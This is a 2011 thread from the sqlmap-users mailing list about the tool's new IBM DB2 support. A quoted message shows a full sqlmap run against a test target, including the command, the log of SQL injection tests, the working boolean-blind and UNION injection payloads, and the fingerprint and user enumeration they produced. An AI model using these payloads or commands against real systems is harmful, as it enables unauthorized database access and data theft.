Re: [sqlmap-users] IBM DB2 support
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] IBM DB2 support
|
From: Andres T. A. <ata...@gm...> - 2011-08-10 09:30:01
|
Hi, Is the "--dbms=db2" flag still unsupported ? I have tried it however the checked payloads were: [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00) comment (NULL) - 1 to 10 columns' Im not sure if this is currently a bug or just the expected result :? Thanks. Andres 2011/7/6 Bernardo Damele A. G. <ber...@gm...> > Hi, > > Update on IBM DB2 support: payload for time-based has been added[1] > last week as well as support for direct connection (-d switch). > > [1] https://twitter.com/#!/sqlmap/status/85659702565937152 > > > On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> > wrote: > > Hi, > > > > The long awaited IBM DB2 support has been implemented in sqlmap. The > > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH > > and merged in sqlmap repository after some tweaking by us. It is very > > stable for both DB2 8.x and 9.x branches. > > The patch includes support to fingerprint and enumerate data on IBM > > DB2 via boolean-based blind SQL injection and UNION query SQL > > injection. Hopefully, soon someone will come up with a payload for > > time-based and error-based techniques too. Support for direct > > connection to the DBMS (-d switch) will be implemented soon as well. > > > > Thank you Sebastian and the rest of the team at r-tec for your patch > > and support! > > > > Sample run against an IBM DB2 9.7 test environment: > > --8<-- > > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user > > > > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover > tool > > http://sqlmap.sourceforge.net > > > > [!] legal disclaimer: usage of sqlmap for attacking targets without > > prior mutual consent is illegal. It is the end user's responsibility > > to obey all applicable local, state and federal laws. Authors assume > > no liability and are not responsible for any misuse or damage caused > > by this program > > > > [*] starting at 10:56:21 > > > > [10:56:21] [INFO] using > > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' > > as session file > > [10:56:21] [INFO] testing connection to the target url > > [10:56:23] [INFO] heuristics detected web page charset 'ascii' > > [10:56:23] [INFO] testing if the url is stable, wait a few seconds > > [10:56:25] [INFO] url is stable > > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic > > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic > > [10:56:26] [INFO] GET parameter 'id' is dynamic > > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might > > be injectable (possible DBMS: DB2) > > [10:56:27] [INFO] testing sql injection on GET parameter 'id' > > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - > > WHERE or HAVING clause' injectable > > parsed error message(s) showed that the back-end DBMS could be DB2. Do > > you want to skip test payloads specific for other DBMSes? [Y/n] > > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > > [10:56:49] [INFO] target url appears to be UNION injectable with 1 > columns > > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - > > 1 to 10 columns' injectable > > GET parameter 'id' is vulnerable. Do you want to keep testing the others? > [y/N] > > sqlmap identified the following injection points with a total of 21 > > HTTP(s) requests: > > --- > > Place: GET > > Parameter: id > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh > > > > Type: UNION query > > Title: Generic UNION query (NULL) - 1 to 10 columns > > Payload: id=1' UNION ALL SELECT > > > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) > > FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM > > --- > > > > [10:58:58] [INFO] testing IBM DB2 > > [10:58:59] [INFO] confirming IBM DB2 > > [10:59:12] [INFO] the back-end DBMS is IBM DB2 > > web server operating system: Windows > > web application technology: PHP 5.3.5, Apache 2.2.17 > > back-end DBMS: active fingerprint: IBM DB2 9.7 > > html error message fingerprint: DB2 > > [10:59:12] [INFO] fetching banner > > banner: 'DB2 v9.7.400.501' > > > > [10:59:13] [INFO] fetching current user > > current user: 'TEST' > > --8<-- > > > > Bernardo > > > > > > -- > > Bernardo Damele A. G. > > > > E-mail / Jabber: bernardo.damele (at) gmail.com > > Mobile: +447788962949 (UK 07788962949) > > PGP Key ID: Unavailable > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
